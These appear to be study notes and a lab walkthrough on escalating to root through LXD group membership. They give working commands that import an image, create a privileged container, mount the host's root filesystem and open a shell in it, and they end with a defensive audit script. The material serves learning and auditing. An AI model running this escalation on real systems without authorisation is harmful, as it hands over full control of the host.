# Intro

- For context, containers operate at the operating system level and virtual machines at the hardware level
- Thus, containers share an OS but isolate sets of one or more apps

# Linux Containers

- `LXC` is an OS-level virtualization technique that allows multiple Linux systems to run in isolation from each other on a single host by owning their own processes but sharing the host system kernel
- The usage of `LXC`, an almost all-encompassing ecosystem, and the innovative associated tools are primarily due to the Docker platform, which established Linux containers
- The entire setup, from creating container templates and deploying them, configuring the operating system and networking, to deploying applications, remains the same

# Linux Daemon

- [LXD](https://github.com/lxc/lxd) is similar to LXC in some respects but is designed to contain a complete OS
- Thus it is not an application container but a system container
- Before we can use this service to privesc, we must be in either the `lxc` or `lxd` group
- We can enum this with the `id` command
- Assuming we are a member of the `lxd` group, there are several ways in which we can exploit `LXC`/`LXD`
- We can either (a) create our own container and transfer it to the target system or (b) use an existing container
- Unfortunately, admins often use templates that have little to no security
- Let's check out existing containers

```bash
cd ContainerImages
ls
# output: ubuntu-template.tar.xz
```

- Templates often do not have passwords, especially if they are uncomplicated test environments
- If we are a little lucky and there is such a container on the system, it can be exploited
- For this, we need to import this container as an image

```bash
# Import the template as an image, then confirm it is listed
lxc image import ubuntu-template.tar.xz --alias ubuntutemp
lxc image list
```

- After verifying that this image has been successfully imported, we can initiate the image and configure it by specifying the `security.privileged` flag and the root path for the container
- This flag disables all isolation features, which allows us to act on the host

```bash
# Create a privileged container from the image
lxc init ubuntutemp privesc -c security.privileged=true
# Attach the host's / as a disk device at /mnt/root inside the container
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
```

- Now, we can start the container and log into it. In the container, we can then go to the path we specified to access the resources of the host system as `root`

```bash
lxc start privesc
lxc exec privesc /bin/bash
# Inside the container (prompt: root@nix02:~#)
ls -l /mnt/root
```

---

# Exercise

- `ping` test

![[images/Pasted image 20260208194924.png]]

- `nmap` scans

![[images/Pasted image 20260208195029.png]]

- `ssh` into box with given creds

![[images/Pasted image 20260208195057.png]]

- light internal enum

![[images/Pasted image 20260208195140.png]]

- enum lxc+lxd

![[images/Pasted image 20260208195214.png]]

- we have access to an alpine image
- import alpine and list

![[images/Pasted image 20260208195334.png]]

- NOTE: misnamed the alias as `ubuntutemp`
- initialize image with `security.privileged=true` flag and configure it to mount the host's `/` at `/mnt/root`

```bash
lxc init ubuntutemp privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
```

![[images/Pasted image 20260208195532.png]]

- Now, let's start the container and open an interactive shell in it

```bash
lxc start privesc
lxc exec privesc /bin/bash
```

- Getting an error when we go to spawn an interactive `bash` shell

![[images/Pasted image 20260208195839.png]]

- Let's try an `sh` shell instead > we're in!

![[images/Pasted image 20260208195904.png]]

- now let's find the flag
- not in `/root`

![[images/Pasted image 20260208200053.png]]

- let's search the disk > there it is!

![[images/Pasted image 20260208200111.png]]
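
The three conditions these notes rely on (membership of the `lxd`/`lxc` group, `security.privileged=true`, and a disk device with `source=/`) can be audited from the defender's side. The script below is an added example, not part of the original notes; the function names and the sample group and config data are constructed for illustration.

```shell
#!/bin/sh
# Added defensive example: audit for the lxd/lxc group escalation path.

# Constructed sample input (not taken from the target in these notes).
sample_group() {
    printf '%s\n' 'root:x:0:' 'lxd:x:116:secaudit,devops' 'sudo:x:27:admin'
}
sample_config() {
    cat <<'EOF'
architecture: x86_64
config:
  security.privileged: "true"
devices:
  host-root:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
ephemeral: false
EOF
}

# stdin: group(5) lines. Prints "group: user" for every lxd/lxc member.
lxd_group_members() {
    awk -F: '($1 == "lxd" || $1 == "lxc") && $4 != "" {
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) print $1 ": " m[i]
    }'
}

# stdin: YAML from `lxc config show <instance>`. Prints one finding per line.
risky_instance_config() {
    awk '
    /^[^ ]/ { section = $1; next }
    { val = $2; gsub(/"/, "", val) }
    section == "config:" && $1 == "security.privileged:" && val == "true" {
        print "security.privileged=true"
    }
    section == "devices:" && /^  [^ ]/ { dev = $1; sub(/:$/, "", dev); names[++n] = dev; next }
    section == "devices:" && $1 == "source:" { src[dev] = val }
    section == "devices:" && $1 == "type:"   { typ[dev] = val }
    END {
        for (i = 1; i <= n; i++)
            if (typ[names[i]] == "disk" && src[names[i]] == "/")
                print "host-root-disk: " names[i]
    }'
}

sample_group | lxd_group_members
sample_config | risky_instance_config
```

On a live host, pipe `getent group lxd lxc` into `lxd_group_members` and `lxc config show --expanded <instance>` into `risky_instance_config`; any non-administrative user in the first output should be treated as root-equivalent.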